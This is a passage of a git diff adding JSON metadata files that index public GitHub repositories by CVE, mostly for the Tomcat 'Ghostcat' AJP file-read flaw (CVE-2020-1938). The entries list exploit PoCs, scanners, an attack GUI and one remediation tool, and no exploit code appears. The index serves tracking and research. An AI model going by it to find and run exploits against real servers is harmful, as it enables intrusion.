"created_at": "2023-08-31T12:47:52Z", + "updated_at": "2023-11-09T02:46:54Z", + "pushed_at": "2023-08-31T12:49:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685775264, + "name": "CVE-2020-19360", + "full_name": "zzzz966\/CVE-2020-19360", + "owner": { + "login": "zzzz966", + "id": 143093302, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143093302?v=4", + "html_url": "https:\/\/github.com\/zzzz966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zzzz966\/CVE-2020-19360", + "description": "Fhem任意文件读取poc", + "fork": false, + "created_at": "2023-09-01T01:33:22Z", + "updated_at": "2023-09-01T01:34:08Z", + "pushed_at": "2023-09-01T01:48:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1937.json b/2020/CVE-2020-1937.json new file mode 100644 index 0000000000..3332df93a9 --- /dev/null +++ b/2020/CVE-2020-1937.json @@ -0,0 +1,33 @@ +[ + { + "id": 327320676, + "name": "apache_kylin", + "full_name": "shanika04\/apache_kylin", + "owner": { + "login": "shanika04", + "id": 73774345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73774345?v=4", + "html_url": "https:\/\/github.com\/shanika04", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanika04\/apache_kylin", + "description": "CVE-2020-1937", + "fork": false, + "created_at": "2021-01-06T13:31:20Z", + "updated_at": "2021-01-06T13:41:05Z", + "pushed_at": "2021-01-06T13:40:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1938.json b/2020/CVE-2020-1938.json new file mode 100644 index 0000000000..8d896da43b --- /dev/null +++ b/2020/CVE-2020-1938.json @@ -0,0 +1,1039 @@ +[ + { + "id": 241940286, + "name": "CVE-2020-1938", + "full_name": "xindongzhuaizhuai\/CVE-2020-1938", + "owner": { + "login": "xindongzhuaizhuai", + "id": 18646159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18646159?v=4", + "html_url": "https:\/\/github.com\/xindongzhuaizhuai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xindongzhuaizhuai\/CVE-2020-1938", + "description": null, + "fork": false, + "created_at": "2020-02-20T17:00:02Z", + "updated_at": "2024-08-12T19:57:56Z", + "pushed_at": "2020-03-02T20:25:35Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 45, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 241943142, + "name": "CVE-2020-1938", + "full_name": "sgdream\/CVE-2020-1938", + "owner": { + "login": "sgdream", + "id": 35300959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35300959?v=4", + "html_url": "https:\/\/github.com\/sgdream", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sgdream\/CVE-2020-1938", + "description": "CVE-2020-1938", + "fork": false, + "created_at": "2020-02-20T17:12:14Z", + "updated_at": "2024-08-12T19:57:56Z", + "pushed_at": "2020-02-20T16:54:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 91, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 91, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 241953243, + "name": "CNVD-2020-10487-Tomcat-ajp-POC", + "full_name": "nibiwodong\/CNVD-2020-10487-Tomcat-ajp-POC", + "owner": { + "login": "nibiwodong", + "id": 17465789, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17465789?v=4", + "html_url": "https:\/\/github.com\/nibiwodong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nibiwodong\/CNVD-2020-10487-Tomcat-ajp-POC", + "description": "CNVD-2020-10487(CVE-2020-1938), tomcat ajp 文件读取漏洞poc", + "fork": false, + "created_at": "2020-02-20T17:57:54Z", + "updated_at": "2024-11-26T06:58:07Z", + "pushed_at": "2020-02-23T17:06:06Z", + "stargazers_count": 119, + "watchers_count": 119, + "has_discussions": false, + "forks_count": 68, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 68, + "watchers": 119, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 241988804, + "name": "CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner", + "full_name": "bkfish\/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner", + "owner": { + "login": "bkfish", + "id": 38547290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38547290?v=4", + "html_url": "https:\/\/github.com\/bkfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bkfish\/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner", + "description": "Cnvd-2020-10487 \/ cve-2020-1938, scanner tool", + "fork": false, + "created_at": "2020-02-20T21:00:15Z", + "updated_at": "2024-11-18T08:48:23Z", + "pushed_at": "2021-11-26T07:40:35Z", + "stargazers_count": 294, + "watchers_count": 294, + "has_discussions": false, + "forks_count": 98, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 98, + "watchers": 294, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 242038197, + "name": "CVE-2020-1938", + "full_name": "laolisafe\/CVE-2020-1938", + "owner": { + "login": "laolisafe", + "id": 45027935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45027935?v=4", + "html_url": "https:\/\/github.com\/laolisafe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laolisafe\/CVE-2020-1938", + "description": "CVE-2020-1938漏洞复现", + "fork": false, + "created_at": "2020-02-21T02:36:37Z", + "updated_at": "2024-08-12T19:57:57Z", + "pushed_at": "2020-02-21T02:49:57Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 37, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 242054816, + "name": "CVE-2020-1938", + "full_name": "h7hac9\/CVE-2020-1938", + "owner": { + "login": "h7hac9", + "id": 24861334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24861334?v=4", + "html_url": "https:\/\/github.com\/h7hac9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h7hac9\/CVE-2020-1938", + "description": null, + "fork": false, + "created_at": "2020-02-21T04:34:40Z", + "updated_at": "2024-08-12T19:57:57Z", + "pushed_at": "2020-02-21T04:40:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 242083141, + "name": "CVE-2020-1938-Tomact-file_include-file_read", + "full_name": "sv3nbeast\/CVE-2020-1938-Tomact-file_include-file_read", + "owner": { + "login": "sv3nbeast", + "id": 55974091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55974091?v=4", + "html_url": "https:\/\/github.com\/sv3nbeast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sv3nbeast\/CVE-2020-1938-Tomact-file_include-file_read", + "description": "Tomcat的文件包含及文件读取漏洞利用POC", + "fork": false, + "created_at": "2020-02-21T07:48:50Z", + "updated_at": "2024-08-12T19:57:57Z", + "pushed_at": "2020-02-21T10:19:52Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 52, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 242093081, + "name": "CVE-2020-1938", + "full_name": "fairyming\/CVE-2020-1938", + "owner": { + "login": "fairyming", + "id": 44915879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44915879?v=4", + "html_url": "https:\/\/github.com\/fairyming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fairyming\/CVE-2020-1938", + "description": "在一定条件下可执行命令", + "fork": false, + "created_at": "2020-02-21T08:42:50Z", + "updated_at": "2024-10-21T02:10:20Z", + "pushed_at": "2020-02-21T08:45:51Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 242107452, + "name": "CVE-2020-1938", + "full_name": "dacade\/CVE-2020-1938", + "owner": { + "login": "dacade", + "id": 31815137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31815137?v=4", + "html_url": "https:\/\/github.com\/dacade", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dacade\/CVE-2020-1938", + "description": null, + "fork": false, + "created_at": "2020-02-21T09:56:19Z", + "updated_at": "2024-11-27T11:31:15Z", + "pushed_at": "2020-02-28T07:08:16Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 242163769, + "name": "CVE-2020-1938TomcatAjpScanner", + "full_name": "woaiqiukui\/CVE-2020-1938TomcatAjpScanner", + "owner": { + "login": "woaiqiukui", + "id": 49117752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49117752?v=4", + "html_url": "https:\/\/github.com\/woaiqiukui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/woaiqiukui\/CVE-2020-1938TomcatAjpScanner", + "description": "批量扫描TomcatAJP漏洞", + "fork": false, + "created_at": "2020-02-21T14:55:40Z", + "updated_at": "2024-08-12T19:57:58Z", + "pushed_at": "2020-02-22T01:58:22Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 242193832, + "name": "tomcat-cve-2020-1938-check", + "full_name": "fatal0\/tomcat-cve-2020-1938-check", + "owner": { + "login": "fatal0", + "id": 6017581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6017581?v=4", + "html_url": "https:\/\/github.com\/fatal0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fatal0\/tomcat-cve-2020-1938-check", + "description": null, + "fork": false, + "created_at": "2020-02-21T17:24:45Z", + "updated_at": "2024-08-12T19:57:58Z", + "pushed_at": "2020-02-25T08:55:09Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 242345920, + "name": "CNVD-2020-10487-Bulk-verification", + "full_name": "delsadan\/CNVD-2020-10487-Bulk-verification", + "owner": { + "login": "delsadan", + "id": 22538623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22538623?v=4", + "html_url": "https:\/\/github.com\/delsadan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delsadan\/CNVD-2020-10487-Bulk-verification", + "description": "CNVD-2020-10487 OR CVE-2020-1938 批量验证脚本,批量验证,并自动截图,方便提交及复核", + "fork": false, + "created_at": "2020-02-22T13:25:57Z", + "updated_at": "2024-08-12T19:58:00Z", + "pushed_at": "2020-02-24T08:18:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 242371713, + "name": "Ghostcat-CNVD-2020-10487", + "full_name": "00theway\/Ghostcat-CNVD-2020-10487", + "owner": { + "login": "00theway", + "id": 25681235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25681235?v=4", + "html_url": "https:\/\/github.com\/00theway", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/00theway\/Ghostcat-CNVD-2020-10487", + "description": "Ghostcat read file\/code execute,CNVD-2020-10487(CVE-2020-1938) ", + "fork": false, + "created_at": "2020-02-22T16:16:20Z", + "updated_at": "2024-11-28T03:45:12Z", + "pushed_at": "2020-03-09T14:51:43Z", + "stargazers_count": 365, + "watchers_count": 365, + "has_discussions": false, + "forks_count": 111, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ajp", + "cnvd-2020-10487", + "cve-2020-1938", + "exp", + "ghostcat" + ], + "visibility": "public", + "forks": 111, + "watchers": 365, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 243285368, + "name": "ghostcat-verification", + "full_name": "shaunmclernon\/ghostcat-verification", + "owner": { + "login": "shaunmclernon", + "id": 54109164, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54109164?v=4", + "html_url": "https:\/\/github.com\/shaunmclernon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shaunmclernon\/ghostcat-verification", + "description": "Learnings on how to verify if vulnerable to Ghostcat (aka CVE-2020-1938)", + "fork": false, + "created_at": "2020-02-26T14:40:12Z", + "updated_at": "2024-08-12T19:58:08Z", + "pushed_at": "2020-02-26T15:33:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 244069452, + "name": "CVE-2020-1938-Clean-Version", + "full_name": "w4fz5uck5\/CVE-2020-1938-Clean-Version", + "owner": { + "login": "w4fz5uck5", + "id": 32375656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32375656?v=4", + "html_url": "https:\/\/github.com\/w4fz5uck5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w4fz5uck5\/CVE-2020-1938-Clean-Version", + "description": "CVE-2020-1938(GhostCat) clean and readable code version", + "fork": false, + "created_at": "2020-03-01T01:45:23Z", + "updated_at": "2024-08-12T19:58:15Z", + "pushed_at": "2023-09-12T13:07:16Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 244516769, + "name": "GhostCat-LFI-exp", + "full_name": "whatboxapp\/GhostCat-LFI-exp", + "owner": { + "login": "whatboxapp", + "id": 50134632, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50134632?v=4", + "html_url": "https:\/\/github.com\/whatboxapp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whatboxapp\/GhostCat-LFI-exp", + "description": "CVE-2020-1938", + "fork": false, + "created_at": "2020-03-03T01:49:54Z", + "updated_at": "2020-03-03T01:49:56Z", + "pushed_at": "2020-02-22T05:23:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 248716444, + "name": "CVE-2020-1938-Tool", + "full_name": "Just1ceP4rtn3r\/CVE-2020-1938-Tool", + "owner": { + "login": "Just1ceP4rtn3r", + "id": 49367740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49367740?v=4", + "html_url": "https:\/\/github.com\/Just1ceP4rtn3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Just1ceP4rtn3r\/CVE-2020-1938-Tool", + "description": "批量检测幽灵猫漏洞", + "fork": false, + "created_at": "2020-03-20T09:29:18Z", + "updated_at": "2024-08-12T19:59:02Z", + "pushed_at": "2020-03-20T09:37:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 250481242, + "name": "CNVD-2020-10487", + "full_name": "doggycheng\/CNVD-2020-10487", + "owner": { + "login": "doggycheng", + "id": 42572366, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42572366?v=4", + "html_url": "https:\/\/github.com\/doggycheng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doggycheng\/CNVD-2020-10487", + "description": "CVE-2020-1938 \/ CNVD-2020-1048 Detection Tools", + "fork": false, + "created_at": "2020-03-27T08:33:28Z", + "updated_at": "2024-08-12T19:59:20Z", + "pushed_at": "2020-03-31T07:17:04Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263382958, + "name": "CVE-2020-1938", + "full_name": "I-Runtime-Error\/CVE-2020-1938", + "owner": { + "login": "I-Runtime-Error", + "id": 61103825, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61103825?v=4", + "html_url": "https:\/\/github.com\/I-Runtime-Error", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/I-Runtime-Error\/CVE-2020-1938", + "description": "This is about CVE-2020-1938", + "fork": false, + "created_at": "2020-05-12T15:54:28Z", + "updated_at": "2020-05-12T17:08:36Z", + "pushed_at": "2020-05-12T17:08:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263413091, + "name": "Ghostcat", + "full_name": "Umesh2807\/Ghostcat", + "owner": { + "login": "Umesh2807", + "id": 65098320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65098320?v=4", + "html_url": "https:\/\/github.com\/Umesh2807", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Umesh2807\/Ghostcat", + "description": "CVE-2020-1938 exploit", + "fork": false, + "created_at": "2020-05-12T18:03:59Z", + "updated_at": "2024-08-12T20:01:25Z", + "pushed_at": "2020-05-12T18:09:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 280544880, + "name": "ghostcatch", + "full_name": "MateoSec\/ghostcatch", + "owner": { + "login": "MateoSec", + "id": 68019458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68019458?v=4", + "html_url": "https:\/\/github.com\/MateoSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MateoSec\/ghostcatch", + "description": "Disables AJP connectors to remediate CVE-2020-1938!", + "fork": false, + "created_at": "2020-07-17T23:34:47Z", + "updated_at": "2020-07-18T00:06:32Z", + "pushed_at": "2020-07-18T00:06:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 334802810, + "name": "CVE-2020-1938-MSF-MODULE", + "full_name": "acodervic\/CVE-2020-1938-MSF-MODULE", + "owner": { + "login": "acodervic", + "id": 57204004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57204004?v=4", + "html_url": "https:\/\/github.com\/acodervic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acodervic\/CVE-2020-1938-MSF-MODULE", + "description": "Modified version of auxiliary\/admin\/http\/tomcat_ghostcat, it can Read any file", + "fork": false, + "created_at": "2021-02-01T01:59:17Z", + "updated_at": "2021-02-03T06:01:40Z", + "pushed_at": "2021-02-01T02:10:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 352232354, + "name": "Hacking-Vulnerability-CVE-2020-1938-Ghostcat", + "full_name": "Hancheng-Lei\/Hacking-Vulnerability-CVE-2020-1938-Ghostcat", + "owner": { + "login": "Hancheng-Lei", + "id": 71180118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71180118?v=4", + "html_url": "https:\/\/github.com\/Hancheng-Lei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hancheng-Lei\/Hacking-Vulnerability-CVE-2020-1938-Ghostcat", + "description": null, + "fork": false, + "created_at": "2021-03-28T03:30:44Z", + "updated_at": "2024-09-13T18:26:52Z", + "pushed_at": "2022-11-27T06:14:19Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 362151453, + "name": "CVE-2020-1938", + "full_name": "streghstreek\/CVE-2020-1938", + "owner": { + "login": "streghstreek", + "id": 71115159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71115159?v=4", + "html_url": "https:\/\/github.com\/streghstreek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/streghstreek\/CVE-2020-1938", + "description": null, + "fork": false, + "created_at": "2021-04-27T14:57:30Z", + "updated_at": "2021-04-27T15:01:11Z", + "pushed_at": "2021-04-27T14:58:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 384971364, + "name": "CVE-2020-1938", + "full_name": "Neko-chanQwQ\/CVE-2020-1938", + "owner": { + "login": "Neko-chanQwQ", + "id": 83222283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83222283?v=4", + "html_url": "https:\/\/github.com\/Neko-chanQwQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Neko-chanQwQ\/CVE-2020-1938", + "description": "Scanner for CVE-2020-1938", + "fork": false, + "created_at": "2021-07-11T14:38:21Z", + "updated_at": "2021-09-11T06:43:54Z", + "pushed_at": "2021-07-15T14:13:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 396080591, + "name": "ghostcat", + "full_name": "jptr218\/ghostcat", + "owner": { + "login": "jptr218", + "id": 84092766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84092766?v=4", + "html_url": "https:\/\/github.com\/jptr218", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jptr218\/ghostcat", + "description": "An implementation of CVE-2020-1938", + "fork": false, + "created_at": "2021-08-14T17:32:51Z", + "updated_at": "2021-08-14T18:21:04Z", + "pushed_at": "2021-08-14T18:21:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414844036, + "name": "CVE-2020-1938Scan", + "full_name": "einzbernnn\/CVE-2020-1938Scan", + "owner": { + "login": "einzbernnn", + "id": 77831842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77831842?v=4", + "html_url": "https:\/\/github.com\/einzbernnn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/einzbernnn\/CVE-2020-1938Scan", + "description": "-H 192.168.1.1-192.168.5.255", + "fork": false, + "created_at": "2021-10-08T04:20:43Z", + "updated_at": "2021-11-09T08:43:47Z", + "pushed_at": "2021-11-02T09:28:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 527251116, + "name": "CVE-2020-1938", + "full_name": "YounesTasra-R4z3rSw0rd\/CVE-2020-1938", + "owner": { + "login": "YounesTasra-R4z3rSw0rd", + "id": 101610095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610095?v=4", + "html_url": "https:\/\/github.com\/YounesTasra-R4z3rSw0rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YounesTasra-R4z3rSw0rd\/CVE-2020-1938", + "description": "This is a modified version of the original GhostCat Exploit", + "fork": false, + "created_at": "2022-08-21T15:44:45Z", + "updated_at": "2023-04-16T17:29:07Z", + "pushed_at": "2022-08-21T15:49:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 565419626, + "name": "AttackTomcat", + "full_name": "tpt11fb\/AttackTomcat", + "owner": { + "login": "tpt11fb", + "id": 80188324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80188324?v=4", + "html_url": "https:\/\/github.com\/tpt11fb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tpt11fb\/AttackTomcat", + "description": "Tomcat常见漏洞GUI利用工具。CVE-2017-12615 PUT文件上传漏洞、tomcat-pass-getshell 弱认证部署war包、弱口令爆破、CVE-2020-1938 Tomcat AJP文件读取\/包含", + "fork": false, + "created_at": "2022-11-13T11:01:41Z", + "updated_at": "2024-11-21T08:56:26Z", + "pushed_at": "2022-11-15T09:05:50Z", + "stargazers_count": 203, + "watchers_count": 203, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 203, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 786312450, + "name": "cve-2020-1938", + "full_name": "Warelock\/cve-2020-1938", + "owner": { + "login": "Warelock", + "id": 87372454, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87372454?v=4", + "html_url": "https:\/\/github.com\/Warelock", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Warelock\/cve-2020-1938", + "description": "cve-2020-1938 Tomcat-Ajp-lfi.git脚本", + "fork": false, + "created_at": "2024-04-14T04:10:41Z", + "updated_at": "2024-05-19T07:27:34Z", + "pushed_at": "2024-04-14T05:32:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845028851, + "name": "CVE-2020-1938", + "full_name": "WHtig3r\/CVE-2020-1938", + "owner": { + "login": "WHtig3r", + "id": 122340070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122340070?v=4", + "html_url": "https:\/\/github.com\/WHtig3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WHtig3r\/CVE-2020-1938", + "description": null, + "fork": false, + "created_at": "2024-08-20T12:51:06Z", + "updated_at": "2024-11-04T09:25:13Z", + "pushed_at": "2024-08-20T13:05:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849195359, + "name": "TomcatScanPro", + "full_name": "lizhianyuguangming\/TomcatScanPro", + "owner": { + "login": "lizhianyuguangming", + "id": 81677104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81677104?v=4", + "html_url": 